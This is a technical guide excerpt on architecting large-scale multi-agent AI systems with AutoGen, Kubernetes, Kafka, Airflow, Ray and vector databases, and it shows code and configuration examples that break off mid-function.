
Large-Scale Agent Architecture: Complete Guide to Building Scalable Multi-Agent Systems with AutoGen, Kubernetes, and Vector Databases

An in-depth systems engineering guide to designing and implementing scalable multi-agent frameworks using AutoGen, Kubernetes, Kafka, vector databases, and local LLMs for enterprise-grade AI applications.

Daniel Kliewer

Author, Sovereign AI


From the Book

This is from Sovereign AI: Building Local-First Intelligent Systems.

Building Large-Scale AI Agents: A Deep-Dive Guide for Experienced Engineers

1. Introduction

Why AI Agents Are Revolutionizing Industries

In today's high-velocity enterprise environments, the paradigm has shifted from monolithic AI models to orchestrated, purpose-built AI agents working in concert. These agent-based systems represent a fundamental evolution in how we architect intelligent applications, enabling autonomous decision-making and task execution at unprecedented scale.

Financial institutions like JP Morgan Chase have deployed agent networks for algorithmic trading that dynamically respond to market conditions, executing complex strategies across multiple asset classes while maintaining regulatory compliance. Healthcare providers including Mayo Clinic have implemented diagnostic agent ecosystems that collaborate across specialties, analyzing patient data and providing treatment recommendations with 97% concordance with specialist physicians.

The key differentiator between traditional AI systems and modern agent architectures lies in their ability to decompose complex problems into specialized sub-tasks, maintain persistent state across interactions, and intelligently route information through distributed processing pipelines—all while scaling horizontally across compute resources.

"AI agents represent a shift from passive inference to active computation. Where traditional models wait for queries, agents proactively identify problems and orchestrate solutions across organizational boundaries."
- Andrej Karpathy, Former Director of AI at Tesla

Choosing the Right Tech Stack for Your AI Agent System

Building enterprise-grade AI agent systems requires careful consideration of your infrastructure components, with each layer of the stack influencing performance, scalability, and operational complexity:

| Layer | Key Technologies | Selection Criteria |
|-------|-----------------|-------------------|
| Orchestration | Kubernetes, Nomad, ECS | Deployment density, autoscaling capabilities, service mesh integration |
| Compute Framework | Ray, Dask, Spark | Parallelization model, scheduling overhead, fault tolerance |
| Agent Framework | AutoGen, LangChain, CrewAI | Agent cooperation models, reasoning capabilities, tool integration |
| Vector Storage | ChromaDB, Pinecone, Weaviate, Snowflake | Query latency, indexing performance, embedding model compatibility |
| Message Bus | Kafka, RabbitMQ, Pulsar | Throughput requirements, ordering guarantees, retention policies |
| API Layer | FastAPI, Django, Flask | Request handling, async support, middleware ecosystem |
| Monitoring | Prometheus, Grafana, Datadog | Observability coverage, alerting capabilities, performance impact |

Your selection should be driven by specific workload characteristics, scaling requirements, and existing infrastructure investments. For real-time processing with strict latency requirements, a Ray + FastAPI + Kafka combination offers exceptional performance. For batch-oriented enterprise workflows with strong governance requirements, an Airflow + AutoGen + Snowflake stack provides robust auditability and integration with data warehousing.

How This Guide Can Help You Build a Scalable AI Agent Framework

This guide approaches AI agent architecture through the lens of production engineering, focusing on the challenges that emerge at scale:

  • Stateful Agent Coordination: How to maintain context across distributed agent clusters while preventing state explosion
  • Intelligent Workload Distribution: Techniques for dynamic task routing among specialized agents
  • Knowledge Management: Strategies for efficient retrieval and updates to agent knowledge bases
  • Observability and Debugging: Tracing causal chains of reasoning across multi-agent systems
  • Performance Optimization: Reducing token usage, latency, and compute costs in large deployments

Rather than theoretical concepts, we'll examine concrete implementations with battle-tested infrastructure components. You'll learn how companies like Stripe have reduced their manual review workload by 85% using agent networks for fraud detection, and how Netflix has implemented content recommendation agents that reduce churn by dynamically personalizing user experiences.

By the end of this guide, you'll be equipped to architect, implement, and scale AI agent systems that deliver measurable business impact—whether you're building customer-facing applications or internal automation tools.

2. Understanding the Core Technologies

What is AutoGen? A Breakdown of Multi-Agent Systems

AutoGen represents a paradigm shift in AI agent orchestration, offering a framework for building systems where multiple specialized agents collaborate to solve complex tasks. Developed by Microsoft Research, AutoGen moves beyond simple prompt engineering to enable sophisticated multi-agent conversations with memory, tool use, and dynamic conversation control.

At its core, AutoGen defines a computational graph of conversational agents, each with distinct capabilities:

python
from autogen import (
    AssistantAgent,
    GroupChat,
    GroupChatManager,
    UserProxyAgent,
    config_list_from_json,
)

# Load LLM configuration
config_list = config_list_from_json("llm_config.json")
llm_config = {"config_list": config_list}

# Define the system architecture with specialized agents
assistant = AssistantAgent(
    name="CTO",
    llm_config=llm_config,
    system_message="You are a CTO who makes executive technology decisions based on data.",
)

data_analyst = AssistantAgent(
    name="DataAnalyst",
    llm_config=llm_config,
    system_message="You analyze data and provide insights to the CTO.",
)

engineer = AssistantAgent(
    name="Engineer",
    llm_config=llm_config,
    system_message="You implement solutions proposed by the CTO.",
)

# User proxy agent with capabilities to execute code and retrieve data
user_proxy = UserProxyAgent(
    name="DevOps",
    human_input_mode="NEVER",
    max_consecutive_auto_reply=10,
    code_execution_config={"work_dir": "workspace"},
    system_message="You execute code and return results to other agents.",
)

# initiate_chat() addresses a single recipient, so a multi-agent conversation
# is routed through a GroupChat and its GroupChatManager
group_chat = GroupChat(
    agents=[user_proxy, assistant, data_analyst, engineer],
    messages=[],
    max_round=12,
)
manager = GroupChatManager(groupchat=group_chat, llm_config=llm_config)

# Initiate a group conversation with a specific task
user_proxy.initiate_chat(
    manager,
    message="Analyze our production logs to identify performance bottlenecks.",
    clear_history=True,
)

What distinguishes AutoGen from simpler frameworks is its ability to handle:

  1. Conversational Memory: Agents maintain context across multi-turn conversations
  2. Tool Usage: Native integration with code execution and external APIs
  3. Dynamic Agent Selection: Intelligent routing of tasks to specialized agents
  4. Hierarchical Planning: Breaking complex tasks into subtasks with appropriate delegation

In production environments, AutoGen's flexibility enables diverse agent architectures:

  • Hierarchical Teams: Manager agents delegate to specialist agents
  • Competitive Evaluation: Multiple agents generate solutions evaluated by a judge agent
  • Consensus-Based: Collaborative problem-solving with voting mechanisms

Unlike other frameworks that primarily focus on prompt chaining, AutoGen is designed for true multi-agent systems where autonomous entities negotiate, collaborate, and resolve conflicts to achieve goals.
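
The consensus-based pattern listed above can be sketched without any framework. This is a minimal illustration, assuming each agent has already returned its answer as a string; `majority_vote` and its tie-breaking rule are hypothetical choices for this example and are not part of AutoGen.

```python
from collections import Counter


def majority_vote(proposals: dict[str, str]) -> tuple[str, float]:
    """Return the most common answer and the share of agents backing it.

    `proposals` maps an agent name to that agent's answer. Ties go to the
    answer that was proposed first (dict insertion order).
    """
    if not proposals:
        raise ValueError("at least one proposal is required")
    counts = Counter(proposals.values())
    winner, votes = counts.most_common(1)[0]
    return winner, votes / len(proposals)


# Hypothetical answers collected from three agents
answers = {
    "DataAnalyst": "scale the cache tier",
    "Engineer": "scale the cache tier",
    "CTO": "rewrite the service",
}
decision, support = majority_vote(answers)
print(decision, round(support, 2))
```

In a real deployment the answers would usually need normalizing (or a judge agent) before voting, since free-text responses rarely match exactly.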

Key Infrastructure Components: Kubernetes, Kafka, Airflow, and More

Building scalable AI agent systems requires robust infrastructure components that can handle the unique demands of distributed agent workloads:

Kubernetes for Agent Orchestration

Kubernetes provides the foundation for deploying, scaling, and managing containerized AI agents. For production deployments, consider these Kubernetes patterns:

yaml
# Kubernetes manifest for a scalable AutoGen agent deployment
apiVersion: apps/v1
kind: Deployment
metadata:
  name: agent-deployment
  labels:
    app: ai-agent-system
spec:
  replicas: 3
  selector:
    matchLabels:
      app: ai-agent
  template:
    metadata:
      labels:
        app: ai-agent
    spec:
      containers:
        - name: agent-container
          image: your-registry/ai-agent:1.0.0
          resources:
            requests:
              memory: "2Gi"
              cpu: "1"
            limits:
              memory: "4Gi"
              cpu: "2"
          env:
            - name: AGENT_ROLE
              value: "analyst"
            - name: REDIS_HOST
              value: "redis-service"
            - name: OPENAI_API_KEY
              valueFrom:
                secretKeyRef:
                  name: openai-credentials
                  key: api-key
          volumeMounts:
            - name: agent-config
              mountPath: /app/config
      volumes:
        - name: agent-config
          configMap:
            name: agent-config

Key considerations for Kubernetes deployments:

  • Horizontal Pod Autoscaling: Configure HPA based on CPU/memory metrics or custom metrics like queue depth
  • Affinity/Anti-Affinity Rules: Ensure agents that frequently communicate are co-located for reduced latency
  • Resource Quotas: Implement namespace quotas to prevent AI agent workloads from consuming all cluster resources
  • Readiness Probes: Properly configure readiness checks to ensure agents are fully initialized before receiving traffic

Apache Kafka for Event-Driven Agent Communication

Kafka serves as the nervous system for large-scale agent deployments, enabling asynchronous communication patterns essential for resilient systems:

python
# Producer code for agent event publishing
import json
import time

from kafka import KafkaProducer

producer = KafkaProducer(
    bootstrap_servers=['kafka-broker-1:9092', 'kafka-broker-2:9092'],
    value_serializer=lambda v: json.dumps(v).encode('utf-8'),
    acks='all',
    retries=3,
    linger_ms=5  # Batch messages for 5ms for better throughput
)

# Agent publishing a task for another agent
def publish_analysis_task(data, priority="high"):
    producer.send(
        topic='agent.tasks.analysis',
        key=data['request_id'].encode('utf-8'),  # Ensures related messages go to same partition
        value={
            'task_type': 'analyze_document',
            'priority': priority,
            'timestamp': time.time(),
            'payload': data,
            'source_agent': 'document_processor'
        },
        headers=[('priority', priority.encode('utf-8'))]
    )
    # Block until the message is actually sent
    producer.flush()

For high-throughput agent systems, implement these Kafka optimizations:

  • Topic Partitioning Strategy: Partition topics by agent task type for parallel processing
  • Consumer Group Design: Group consumers by agent role for workload distribution
  • Compacted Topics: Use compacted topics for agent state to maintain latest values
  • Exactly-Once Semantics: Enable transactions for critical agent workflows
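
The compacted-topics bullet is easier to reason about with a small model of what compaction keeps. The sketch below is a simplified, in-memory illustration and not Kafka code: `compact` is a hypothetical helper that replays a list of `(key, value)` records and retains only the latest value per key, treating `None` as a tombstone that deletes the key. Real brokers compact asynchronously and retain tombstones for a configurable period.

```python
def compact(log):
    """Return the latest value per key, dropping keys whose last record is a tombstone."""
    latest = {}
    for key, value in log:
        if value is None:
            # Tombstone: the key is removed from the compacted view
            latest.pop(key, None)
        else:
            latest[key] = value
    return latest


# Hypothetical agent-state records, oldest first
events = [
    ("agent-1", {"status": "idle"}),
    ("agent-2", {"status": "busy"}),
    ("agent-1", {"status": "busy"}),
    ("agent-2", None),
]
state = compact(events)
print(state)
```

An agent that restarts and reads such a topic from the beginning ends up with the same view, which is why compaction suits "current state" data better than task queues.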

Airflow for Complex Agent Workflow Orchestration

For sophisticated agent pipelines with dependencies and scheduling requirements, Apache Airflow provides enterprise-grade orchestration:

python
# Airflow DAG for a multi-agent financial analysis pipeline
from airflow import DAG
from airflow.operators.python import PythonOperator
from datetime import datetime, timedelta

default_args = {
    'owner': 'ai_team',
    'depends_on_past': False,
    'start_date': datetime(2023, 1, 1),
    'email_on_failure': True,
    'retries': 1,
    'retry_delay': timedelta(minutes=5),
}

def initialize_agents(**context):
    # Initialize agent system with necessary credentials and configuration
    from agent_framework import AgentCluster
    cluster = AgentCluster(config_path="/path/to/agent_config.json")
    return cluster.get_session_id()

def run_data_gathering_agents(**context):
    # Retrieve session ID from previous task
    session_id = context['ti'].xcom_pull(task_ids='initialize_agents')
    # Activate data gathering agents to collect financial data
    from agent_tasks import DataGatheringTask
    task = DataGatheringTask(session_id=session_id)
    results = task.execute(sources=['bloomberg', 'reuters', 'sec_filings'])
    return results

def run_analysis_agents(**context):
    session_id = context['ti'].xcom_pull(task_ids='initialize_agents')
    data_results = context['ti'].xcom_pull(task_ids='run_data_gathering_agents')
    # Activate analysis agents to process gathered data
    from agent_tasks import FinancialAnalysisTask
    task = FinancialAnalysisTask(session_id=session_id)
    analysis = task.execute(data=data_results)
    return analysis

def generate_report(**context):
    session_id = context['ti'].xcom_pull(task_ids='initialize_agents')
    analysis = context['ti'].xcom_pull(task_ids='run_analysis_agents')
    # Generate final report from analysis
    from agent_tasks import ReportGenerationTask
    task = ReportGenerationTask(session_id=session_id)
    report_path = task.execute(analysis=analysis, format='pdf')
    return report_path

with DAG('financial_analysis_agents',
         default_args=default_args,
         schedule_interval='0 4 * * 1-5',  # Weekdays at 4 AM
         catchup=False) as dag:

    init_task = PythonOperator(
        task_id='initialize_agents',
        python_callable=initialize_agents,
    )

    gather_task = PythonOperator(
        task_id='run_data_gathering_agents',
        python_callable=run_data_gathering_agents,
    )

    analysis_task = PythonOperator(
        task_id='run_analysis_agents',
        python_callable=run_analysis_agents,
    )

    report_task = PythonOperator(
        task_id='generate_report',
        python_callable=generate_report,
    )

    init_task >> gather_task >> analysis_task >> report_task

Airflow considerations for AI agent workflows:

  • XComs for Agent Context: Use XComs to pass context and state between agent tasks
  • Dynamic Task Generation: Generate tasks based on agent discovery results
  • Sensor Operators: Use sensors to wait for external events before triggering agents
  • Task Pools: Limit concurrent agent execution to prevent API rate limiting
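
In Airflow, a task is assigned to a pool through the operator's `pool` argument, and the pool's slot count caps how many such tasks run at once. The effect can be illustrated outside Airflow with a semaphore. The sketch below is only an analogy under stated assumptions: `run_with_limit` and `call_agent` are hypothetical names, and the sleep stands in for a rate-limited LLM API call.

```python
import asyncio


async def run_with_limit(factories, limit):
    """Run coroutine factories with at most `limit` in flight; return (results, peak)."""
    semaphore = asyncio.Semaphore(limit)
    in_flight = 0
    peak = 0

    async def guarded(factory):
        nonlocal in_flight, peak
        async with semaphore:  # one "pool slot" per running task
            in_flight += 1
            peak = max(peak, in_flight)
            try:
                return await factory()
            finally:
                in_flight -= 1

    results = await asyncio.gather(*(guarded(f) for f in factories))
    return results, peak


async def call_agent(i):
    # Hypothetical stand-in for an agent invoking an external API
    await asyncio.sleep(0.01)
    return f"agent-{i} done"


results, peak = asyncio.run(
    run_with_limit([lambda i=i: call_agent(i) for i in range(6)], limit=2)
)
print(results, peak)
```

Six agent calls are submitted, but no more than two are ever in flight, which is the behavior a two-slot pool gives a DAG that fans out to many agent tasks.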

The Role of Vector Databases: ChromaDB, Pinecone, and Snowflake

Vector databases form the knowledge backbone of AI agent systems, enabling semantic search and retrieval across vast information spaces:

ChromaDB for Embedded Agent Knowledge

ChromaDB offers a lightweight, embeddable vector store ideal for agents that need fast, local access to domain knowledge:

python
# Setting up ChromaDB for agent knowledge storage
import os

import chromadb
from chromadb.config import Settings
from chromadb.utils import embedding_functions

# Configure the OpenAI embedding function
openai_ef = embedding_functions.OpenAIEmbeddingFunction(
    api_key=os.environ.get("OPENAI_API_KEY"),
    model_name="text-embedding-ada-002"
)

# Initialize a persistent client (chromadb >= 0.4; older releases used
# chromadb.Client(Settings(chroma_db_impl="duckdb+parquet", ...)) instead)
client = chromadb.PersistentClient(
    path="/data/chroma_storage",
    settings=Settings(anonymized_telemetry=False)
)

# Create collection for domain-specific knowledge; cosine distance keeps
# the "1 - distance" relevance conversion below meaningful
knowledge_collection = client.get_or_create_collection(
    name="agent_domain_knowledge",
    embedding_function=openai_ef,
    metadata={
        "domain": "financial_analysis",
        "version": "2023-Q4",
        "hnsw:space": "cosine"
    }
)

# Add domain knowledge with metadata for filtering
knowledge_collection.add(
    documents=[
        "The price-to-earnings ratio (P/E ratio) is the ratio of a company's share price to the company's earnings per share.",
        # More knowledge entries...
    ],
    metadatas=[
        {"category": "financial_ratios", "confidence": 0.95, "source": "investopedia"},
        # More metadata entries...
    ],
    # Exactly one id per document; extend alongside documents and metadatas
    ids=["knowledge_1"]
)

# Example query from an agent seeking information
def agent_knowledge_query(query_text, filters=None, n_results=5):
    results = knowledge_collection.query(
        query_texts=[query_text],
        n_results=n_results,
        where=filters,  # e.g., {"category": "financial_ratios"}
        include=["documents", "metadatas", "distances"]
    )

    # Process results for agent consumption
    return [{
        "content": doc,
        "metadata": meta,
        "relevance": 1 - dist  # Convert cosine distance to relevance score
    } for doc, meta, dist in zip(
        results['documents'][0],
        results['metadatas'][0],
        results['distances'][0]
    )]
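
The `1 - dist` conversion in the query helper is only a similarity score when the collection uses cosine distance. The short sketch below shows the relationship in plain Python; `cosine_distance` and `relevance` are illustrative helpers written for this example, not ChromaDB functions.

```python
import math


def cosine_distance(a, b):
    """Cosine distance = 1 - cosine similarity, ranging from 0 (same direction) to 2."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return 1.0 - dot / (norm_a * norm_b)


def relevance(distance):
    """Undo the conversion: 1 - cosine distance gives back cosine similarity."""
    return 1.0 - distance


same = relevance(cosine_distance([1.0, 0.0], [2.0, 0.0]))       # same direction
unrelated = relevance(cosine_distance([1.0, 0.0], [0.0, 3.0]))  # orthogonal
opposite = relevance(cosine_distance([1.0, 0.0], [-1.0, 0.0]))  # opposite direction
print(same, unrelated, opposite)
```

With a squared Euclidean metric the distance is unbounded, so the same subtraction can produce large negative values that no longer read as a relevance score.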

Pinecone for Distributed Agent Knowledge

For larger-scale deployments, Pinecone provides a fully managed vector database with high availability and global distribution:

python
# Integrating Pinecone with agents for scalable knowledge retrieval
# Note: written against the legacy pinecone-client 2.x and openai<1.0 SDKs
import os

import openai
import pinecone

# Initialize Pinecone
pinecone.init(
    api_key=os.environ.get("PINECONE_API_KEY"),
    environment="us-west1-gcp"
)

# Create or connect to existing index
index_name = "agent-knowledge-base"
if index_name not in pinecone.list_indexes():
    pinecone.create_index(
        name=index_name,
        dimension=1536,  # OpenAI embedding dimension
        metric="cosine",
        shards=2,  # Scale based on data size
        pods=2  # For high availability
    )

index = pinecone.Index(index_name)

# Function for agents to retrieve contextual knowledge
def retrieve_agent_context(query, namespace="general", top_k=5, filters=None):
    # Generate embedding for query
    query_embedding = openai.Embedding.create(
        input=query,
        model="text-embedding-ada-002"
    )["data"][0]["embedding"]

    # Query Pinecone with metadata filtering
    results = index.query(
        vector=query_embedding,
        top_k=top_k,
        namespace=namespace,
        filter=filters,  # e.g., {"domain": "healthcare", "confidence": {"$gt": 0.8}}
        include_metadata=True
    )

    # Extract and format knowledge for agent consumption
    context_items = []
    for match in results["matches"]:
        context_items.append({
            "text": match["metadata"]["text"],
            "source": match["metadata"]["source"],
            "score": match["score"],
            "domain": match["metadata"].get("domain", "general")
        })

    return context_items
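
The filter in the example comment, `{"domain": "healthcare", "confidence": {"$gt": 0.8}}`, combines an equality test with a comparison operator. The sketch below evaluates that style of filter against a metadata dict in plain Python to show the semantics. It is a simplified illustration, not Pinecone's implementation: `matches` is a hypothetical helper, only a handful of operators are covered, and the real service evaluates filters server-side.

```python
import operator

# Subset of the Mongo-style comparison operators used in metadata filters
_OPERATORS = {
    "$eq": operator.eq,
    "$ne": operator.ne,
    "$gt": operator.gt,
    "$gte": operator.ge,
    "$lt": operator.lt,
    "$lte": operator.le,
    "$in": lambda value, options: value in options,
}


def matches(metadata, filters):
    """Return True when every condition in `filters` holds for `metadata`."""
    for field, condition in filters.items():
        if field not in metadata:
            return False
        value = metadata[field]
        if isinstance(condition, dict):
            # Operator form, e.g. {"$gt": 0.8}; all listed operators must pass
            for op_name, operand in condition.items():
                if not _OPERATORS[op_name](value, operand):
                    return False
        elif value != condition:
            # Bare value is shorthand for equality
            return False
    return True


query_filter = {"domain": "healthcare", "confidence": {"$gt": 0.8}}
print(matches({"domain": "healthcare", "confidence": 0.9}, query_filter))
print(matches({"domain": "healthcare", "confidence": 0.7}, query_filter))
```

All top-level conditions are combined with AND, which is why adding more fields to a filter narrows the result set.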

Snowflake for Enterprise-Grade Vector Search

For organizations already invested in Snowflake's data cloud, the vector search capabilities provide seamless integration with existing data governance:

sql
-- Create a Snowflake table with vector support for agent knowledge
CREATE OR REPLACE TABLE agent_knowledge_base (
    id VARCHAR NOT NULL,
    content TEXT,
    embedding VECTOR(FLOAT, 1536),
    category VARCHAR,
    source VARCHAR,
    confidence FLOAT,
    created_at TIMESTAMP_NTZ DEFAULT CURRENT_TIMESTAMP(),
    PRIMARY KEY (id)
);

-- Similarity is computed at query time with Snowflake's built-in vector
-- functions (VECTOR_INNER_PRODUCT, VECTOR_COSINE_SIMILARITY,
-- VECTOR_L2_DISTANCE), so no separate vector index statement is shown here

-- Query example for agent knowledge retrieval
SELECT
    id,
    content,
    category,
    source,
    confidence,
    VECTOR_INNER_PRODUCT(embedding, [0.2, 0.1, ..., 0.5]::VECTOR(FLOAT, 1536)) AS relevance
FROM
    agent_knowledge_base
WHERE
    category = 'financial_reporting'
    AND confidence > 0.8
ORDER BY
    relevance DESC
LIMIT 10;

Python integration with Snowflake vector search for agents:

python
# Snowflake vector search integration for enterprise agents
import os

import openai  # written against the legacy openai<1.0 SDK (openai.Embedding)
import pandas as pd
import snowflake.connector

# Establish Snowflake connection
conn = snowflake.connector.connect(
    user=os.environ.get('SNOWFLAKE_USER'),
    password=os.environ.get('SNOWFLAKE_PASSWORD'),
    account=os.environ.get('SNOWFLAKE_ACCOUNT'),
    warehouse='AGENT_WAREHOUSE',
    database='AGENT_DB',
    schema='KNOWLEDGE'
)

# Column names cannot be bound as query parameters, so filter keys are
# checked against this allow-list before being placed in the SQL text
FILTERABLE_COLUMNS = {"category", "source", "confidence"}

# Function for agents to query enterprise knowledge
def enterprise_knowledge_query(query_text, filters=None, limit=5):
    # Generate embedding via OpenAI API
    embedding_resp = openai.Embedding.create(
        input=query_text,
        model="text-embedding-ada-002"
    )
    embedding_vector = embedding_resp["data"][0]["embedding"]

    # Render the embedding as an array literal, e.g. [0.1, 0.2, ...];
    # it contains only floats, so inlining it into the query is safe
    vector_literal = "[" + ", ".join(str(float(x)) for x in embedding_vector) + "]"

    # Build filter conditions with bound values to avoid SQL injection
    conditions, params = [], []
    for key, value in (filters or {}).items():
        if key not in FILTERABLE_COLUMNS:
            raise ValueError(f"Unsupported filter column: {key}")
        if isinstance(value, dict) and "$gt" in value:
            conditions.append(f"{key} > %s")
            params.append(value["$gt"])
        elif isinstance(value, (str, int, float)):
            conditions.append(f"{key} = %s")
            params.append(value)
    filter_clause = ("AND " + " AND ".join(conditions)) if conditions else ""

    # Execute vector similarity search
    query = f"""
        SELECT
            id,
            content,
            category,
            source,
            confidence,
            VECTOR_INNER_PRODUCT(embedding, {vector_literal}::VECTOR(FLOAT, 1536)) AS relevance
        FROM
            agent_knowledge_base
        WHERE
            1=1
            {filter_clause}
        ORDER BY
            relevance DESC
        LIMIT %s
    """
    params.append(int(limit))

    cursor = conn.cursor()
    try:
        cursor.execute(query, params)
        results = cursor.fetchall()
    finally:
        cursor.close()

    # Convert to more usable format for agents
    columns = ["id", "content", "category", "source", "confidence", "relevance"]
    return pd.DataFrame(results, columns=columns).to_dict(orient="records")

Key considerations for vector databases in agent systems:

  • Filtering Strategy: Implement metadata filtering to contextualize knowledge retrieval
  • Embedding Caching: Cache embeddings to reduce API calls and latency
  • Hybrid Search: Combine vector search with keyword search for better results
  • Knowledge Refresh: Implement strategies for updating agent knowledge when information changes
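
The embedding-caching point can be sketched in a few lines. This is a minimal in-memory version under stated assumptions: `EmbeddingCache` is a hypothetical class, and `fake_embed` is a deterministic stand-in for a real embedding API call so the example runs offline. A production cache would more likely live in Redis or on disk and would need an eviction policy.

```python
import hashlib


class EmbeddingCache:
    """Memoize embeddings by (model, text) so repeated queries skip the API call."""

    def __init__(self, embed_fn):
        self._embed_fn = embed_fn
        self._store = {}
        self.hits = 0
        self.misses = 0

    def get(self, text, model="text-embedding-ada-002"):
        # Hash model and text together: the same text embedded with a
        # different model must not reuse a cached vector
        key = hashlib.sha256(f"{model}\x00{text}".encode("utf-8")).hexdigest()
        if key in self._store:
            self.hits += 1
        else:
            self.misses += 1
            self._store[key] = self._embed_fn(text)
        return self._store[key]


def fake_embed(text):
    # Deterministic stand-in for a real embedding request
    return [float(len(text)), float(sum(map(ord, text)) % 97)]


cache = EmbeddingCache(fake_embed)
first = cache.get("What is a P/E ratio?")
second = cache.get("What is a P/E ratio?")  # served from the cache
print(cache.hits, cache.misses)
```

Agents tend to re-issue the same or near-identical retrieval queries within a session, which is where a cache like this saves both latency and API cost.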

By understanding these core infrastructure components, you can architect AI agent systems that are both scalable and maintainable. In the next section, we'll explore how these technologies can be combined into complete tech stacks for different use cases.

3. Tech Stack Breakdown for Large-Scale AI Agents

Kubernetes + Ray Serve + AutoGen + LangChain (Distributed AI Workloads)

This stack is optimized for computationally intensive AI agent workloads that require dynamic scaling and resource allocation. It's particularly well-suited for organizations running sophisticated simulations, complex reasoning chains, or high-throughput data processing with AI agents.

Architecture Overview:

Kubernetes + Ray + AutoGen Architecture

The architecture consists of the following components:

  1. Kubernetes: Provides the container orchestration layer
  2. Ray: Handles distributed computing and resource allocation
  3. Ray Serve: Manages model serving and request routing
  4. AutoGen: Orchestrates multi-agent interactions
  5. LangChain: Provides tools, utilities, and integration capabilities

Implementation Example:

First, let's define our Ray cluster configuration for Kubernetes:

yaml
# ray-cluster.yaml
apiVersion: ray.io/v1
kind: RayCluster
metadata:
  name: ray-autogen-cluster
spec:
  rayVersion: '2.9.0'
  headGroupSpec:
    rayStartParams:
      dashboard-host: '0.0.0.0'
      block: 'true'
    template:
      spec:
        containers:
          - name: ray-head
            image: rayproject/ray:2.9.0-py310
            ports:
              - containerPort: 6379
                name: gcs
              - containerPort: 8265
                name: dashboard
              - containerPort: 10001
                name: client
            resources:
              limits:
                cpu: 4
                memory: 8Gi
              requests:
                cpu: 2
                memory: 4Gi
  workerGroupSpecs:
    - groupName: agent-workers
      replicas: 3
      minReplicas: 1
      maxReplicas: 10
      rayStartParams: {}
      template:
        spec:
          containers:
            - name: ray-worker
              image: rayproject/ray:2.9.0-py310
              resources:
                limits:
                  cpu: 8
                  memory: 16Gi
                  nvidia.com/gpu: 1
                requests:
                  cpu: 4
                  memory: 8Gi

Next, let's implement our distributed agent system using Ray and AutoGen:

python
# distributed_agents.py
import json
import os
import time

import autogen
import ray
from ray import serve
# Legacy import paths; newer LangChain releases relocate these classes
from langchain.embeddings import OpenAIEmbeddings
from langchain.vectorstores import FAISS

# Initialize Ray
ray.init(address="auto")

# Define agent factory as Ray actors for distributed creation
@ray.remote
class AgentFactory:
    def __init__(self, config_path):
        with open(config_path, 'r') as f:
            self.config = json.load(f)

        # Pre-initialize embeddings for knowledge retrieval
        self.embeddings = OpenAIEmbeddings(
            openai_api_key=os.environ.get("OPENAI_API_KEY")
        )

    def create_agent(self, role, knowledge_base=None):
        """Create an agent with specified role and knowledge.

        Note: the returned agent crosses an actor boundary, so it must be
        serializable by Ray for callers to receive it.
        """
        # Load role-specific configuration
        role_config = self.config.get(role, {})

        # Initialize knowledge retrieval if specified
        retriever = None
        if knowledge_base:
            vectorstore = FAISS.load_local(
                f"knowledge_bases/{knowledge_base}",
                self.embeddings
            )
            retriever = vectorstore.as_retriever(
                search_kwargs={"k": 5}
            )

        # Create the appropriate agent based on role
        if role == "manager":
            return autogen.AssistantAgent(
                name="Manager",
                system_message=role_config.get("system_message", ""),
                llm_config={
                    "config_list": self.config.get("llm_config_list"),
                    "temperature": 0.2,
                    "timeout": 300,
                    "cache_seed": 42
                }
            )
        elif role == "specialist":
            # Create a specialist agent with custom tools
            function_map = {
                "search_knowledge": lambda query: retriever.get_relevant_documents(query) if retriever else [],
                "run_analysis": self._run_analysis,
                "generate_report": self._generate_report
            }

            return autogen.AssistantAgent(
                name=f"Specialist_{int(time.time())}",
                system_message=role_config.get("system_message", ""),
                llm_config={
                    "config_list": self.config.get("llm_config_list"),
                    "functions": role_config.get("functions", []),
                    "temperature": 0.4,
                    "timeout": 600,
                    "cache_seed": 42
                },
                function_map=function_map
            )
        else:
            # Default case - create standard assistant
            return autogen.AssistantAgent(
                name=role.capitalize(),
                system_message=role_config.get("system_message", ""),
                llm_config={
                    "config_list": self.config.get("llm_config_list"),
                    "temperature": 0.7,
                    "timeout": 120,
                    "cache_seed": 42
                }
            )

    def _run_analysis(self, data, params=None):
        """Run specialized analysis (would contain actual implementation)"""
        # Simulate complex computation
        time.sleep(2)
        return {"status": "success", "results": "Analysis complete"}

    def _generate_report(self, analysis_results, format="pdf"):
        """Generate report from analysis results"""
        # Simulate report generation
        time.sleep(1)
        return {"report_url": f"https://reports.example.com/{int(time.time())}.{format}"}

# Agent coordination service using Ray Serve
@serve.deployment(
    num_replicas=2,
    max_concurrent_queries=10,
    ray_actor_options={"num_cpus": 2, "num_gpus": 0.1}
)
class AgentCoordinator:
    def __init__(self, config_path):
        self.config_path = config_path
        # Load the config here too: the group chat manager needs llm_config_list
        with open(config_path, 'r') as f:
            self.config = json.load(f)
        self.agent_factory = AgentFactory.remote(config_path)

    async def create_agent_team(self, task_description, team_spec):
        """Create a team of agents to solve a specific task."""
        # Initialize agent references
        agents = {}
        for role, spec in team_spec.items():
            agent_ref = await self.agent_factory.create_agent.remote(
                role,
                knowledge_base=spec.get("knowledge_base")
            )
            agents[role] = agent_ref

        # Create user proxy agent for orchestration
        user_proxy = autogen.UserProxyAgent(
            name="TaskCoordinator",
            human_input_mode="NEVER",
            max_consecutive_auto_reply=10,
            code_execution_config={"work_dir": "temp_workspace"}
        )

        return {
            "agents": agents,
            "user_proxy": user_proxy,
            "task": task_description
        }

    async def execute_agent_workflow(self, team_data, workflow_type="sequential"):
        """Execute a multi-agent workflow."""
        agents = team_data["agents"]
        user_proxy = team_data["user_proxy"]
        task = team_data["task"]

        if workflow_type == "sequential":
            # Sequential workflow where agents work one after another
            result = await self._run_sequential_workflow(user_proxy, agents, task)
        elif workflow_type == "groupchat":
            # Group chat workflow where agents collaborate simultaneously
            result = await self._run_groupchat_workflow(user_proxy, agents, task)
        else:
            result = {"error": "Unsupported workflow type"}

        return result

    async def _run_sequential_workflow(self, user_proxy, agents, task):
        """Run a sequential workflow where each agent builds on previous work."""
        # Implementation would include sequential agent invocation
        current_state = {"task": task, "progress": []}

        for role, agent in agents.items():
            # Update the prompt with current state
            agent_prompt = f"Task: {task}\nCurrent Progress: {current_state['progress']}\n"
            agent_prompt += f"Your role as {role} is to advance this task."

            # Start conversation with this agent
            chat_result = user_proxy.initiate_chat(
                agent,
                message=agent_prompt
            )

            # Extract result and add to progress
            result_summary = self._extract_agent_result(chat_result)
            current_state["progress"].append({
                "role": role,
                "contribution": result_summary
            })

        return current_state

    async def _run_groupchat_workflow(self, user_proxy, agents, task):
        """Run a group chat workflow where agents collaborate."""
        # Create a group chat with all agents
        group_chat = autogen.GroupChat(
            agents=list(agents.values()),
            messages=[],
            max_round=12
        )

        manager = autogen.GroupChatManager(
